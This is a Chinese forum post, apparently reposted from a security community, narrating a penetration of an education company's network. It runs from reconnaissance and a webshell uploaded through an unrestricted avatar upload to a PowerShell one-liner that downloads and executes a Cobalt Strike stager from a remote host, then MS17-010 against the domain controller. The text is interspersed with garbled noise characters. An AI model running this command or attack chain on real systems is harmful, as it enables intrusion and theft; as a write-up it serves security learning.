9 Z" m n4 k( {" i/ \& N; L% x 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路% p$ ]2 w' b2 v$ c! b; c. J
/ S D6 G' `/ R+ a s+ m; Q0 l$ Q# T1 b2 W. Q 6 a5 {4 D; F- _
8 ^0 b u- g" ?; H1 S+ i, |+ F3 [* O& R' J 正文8 h4 ~" F5 B) ^2 U$ Q; w, S
1 [" Q' _$ P/ i: L
/ K% u& T& ?) C! A. I0 X! K% b2 q$ o
目标:www.xxxx.com(一家教育机构)
1 z' e' [. m' x5 m# M
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
+ u; B9 X0 G0 W
进行了简单的信息搜集
3 ]+ Z [. Y! }! {+ l. k+ ~! @
- D; A# [" c+ N$ i. I0 N
( u: h. [0 o6 l 子域名搜集+ |9 L3 a8 o5 A
0 j3 Z+ T* {" R$ d) h5 i" q1 q8 D: N, \/ }5 Z* j! b 9 p o, j6 k7 e
fofa找资产
: W7 E( B7 h; C# N# C, F
一共七个资产。去重之后只有两个。
: Q9 Q$ W7 C# J5 n' J3 w! T
目录探测, f( F' V# D9 o0 k. S" K+ i
: F! R. e& r. C$ h3 u2 _! B/ }# ]1 X/ V
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% f6 B# J9 k0 r3 K/ s* A
我又尝试了通过修改返回包来绕过登录界面8 N! P% y- z- Y1 @8 A$ \9 b
d' M, y8 G* t' L' z$ G5 r7 _- P" I' p5 x0 L4 u* r! ]* H
. o1 E; p, ?0 I. Q 还是不行,尝试注入无果1 z$ i0 {6 H8 u" M7 l C
5 i# [7 d2 [! W4 {
! u$ i" z+ J& g/ M- G1 z, q8 K* [/ R d
不过我目录探测出了一处Spring信息泄露
# I8 R- `1 E+ d+ ^' m% x
6 y; s [3 g) `; Y J- r U
2 x6 t8 Q* k' S% V, w) k7 j2 y+ n尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
. N1 l* j' K+ a/ H0 K) E- O* [, u* R
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
: ?9 {, X' F& Y+ j7 M; g! f- B& A# m0 y : D$ U; _* _% p" t- M
获取有些师傅到这一步就手机抓包电脑测了。
3 J K7 e% S- j( r% U q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
7 J. q$ x. f4 u' j 其中在一个公众号发现了小程序,可以进行注册。+ g) T# @" P ~
; @; y+ d0 t. d1 O2 r 看到了头像上传,尝试上传获取WebShell5 f9 J) A" z0 n* _ g1 b( W9 K
, P6 P0 \ L# }) x9 z
5 \8 | H ~ _9 C! N4 ` 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问' T( r6 E+ y7 X3 L5 |5 Q8 }2 j
+ @" @+ `/ W9 j, k. Y
然后上了大马
! J6 f) i( I- C3 r7 \
: X$ g8 F' R; h7 M' T ( n8 X _/ p$ Q! S& y
' g1 x9 l. a# J) d3 }8 J$ n. e 通过翻找文件发现数据库账号密码
. W# }% [0 ~' P. W# G
$ T1 M1 G$ S5 \6 \* ?% c --内网渗透0 f* v( G6 [2 u6 {( I6 N& R/ S
1 g) n% c4 a6 S8 X# w' m: V8 ^: ^/ ]9 z 直接通过powershell执行 cs上线
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
. N* f3 q1 n. h, _) m0 b8 H0 |% x+ X
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
7 t) E) g. `5 U4 F2 ?
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ M9 t# V, n9 r1 f
+ b% `( c# t4 q0 x# @
' D; t/ [% Z. U2 {: m0 c / D* g! Q3 \# N6 ~! g4 {& V
, M$ A# c4 Z6 O) z+ G k
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
+ J* W0 E, s+ c& p+ C9 o) o
% Z: _5 N( p' A5 b8 S. B ' D6 T" w; J4 z: [7 a
- T9 h1 F- l2 q% R0 ^/ Y; e2 @' [$ d
' z D, o0 H" L: [/ ^, i- b- E
- Q5 W& H! H' \( t+ R$ E
4 p' Z2 H+ I- b7 T6 E) q
, i, M. z& t8 \5 T5 X小结
v1 b# A2 \4 i2 p
9 ^+ z5 T. w# O' U) r 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
% \0 Y# L8 D3 g; O$ P% O$ M7 v/ ~2 L' I! N6 T" \: w4 M4 _/ k
. ?$ x* m1 F& {9 n' N( S 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html! H {, Y7 L; I
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |